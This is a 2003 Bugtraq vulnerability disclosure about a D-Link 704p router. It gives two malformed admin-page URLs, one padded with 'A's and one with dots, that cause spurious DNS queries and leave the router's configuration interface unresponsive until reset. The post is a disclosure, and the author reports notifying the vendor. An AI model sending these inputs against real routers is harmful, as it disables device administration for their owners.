Buffer Overflow? Local Malformed URL attack on D-Link 704p router

From: Chris R (admin_at_securityindex.net)
Date: 05/26/03

    Date: 26 May 2003 05:53:41 -0000
    To: bugtraq@securityfocus.com
    
    

    My home network uses a small 4 port broadband D-Link router (704p). The
    firmware was updated a week ago.

    The following malformed URLs cause odd behavior in the router. Pointing
    your browser (like most routers) to the gateway's internal IP address, you
    get a web interface for administering your router.

    http://192.168.0.1/syslog.htm?
    D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    This URL caused the router to do a DNS query on:
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net

    "@xxxx.xx.comcast.net" is the trailing end of my hostname (I replaced the
    real trailing host name with x's as to not give up my location! heh)

    Subsequently there was a DNS response "no such name".
    Enough of these malformed URLs causes the DNS server to DoS the router for
    a short time because a DNS response packet is much larger than a DNS query
    packet.
    This URL also caused an error in the router's log file page; the URL
    made the page look odd. This router uses CSS to display its tabs and log
    file (syslog.htm). Some of the HTML was visible within the CSS that were
    now repeating across the page. I took a screen shot and uploaded it to my
    webspace.

    http://www.securityindex.net/router.JPG

    ---
    http://192.168.0.1/syslog.htm?
    D=.........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ...........................................................................
    ....................
    This malformed URL caused the router to stop responding. Requesting this
    URL over and over will eventually render the router useless until reset.
    You can still access the internet after sending this URL once, but the
    router's configuration page does not respond until you reset the router.
    -->
     I sent an email to D-Link containing a copy of this post. Thanx
    -->
    --chris
    www.securityindex.net
    -apex security group-
    
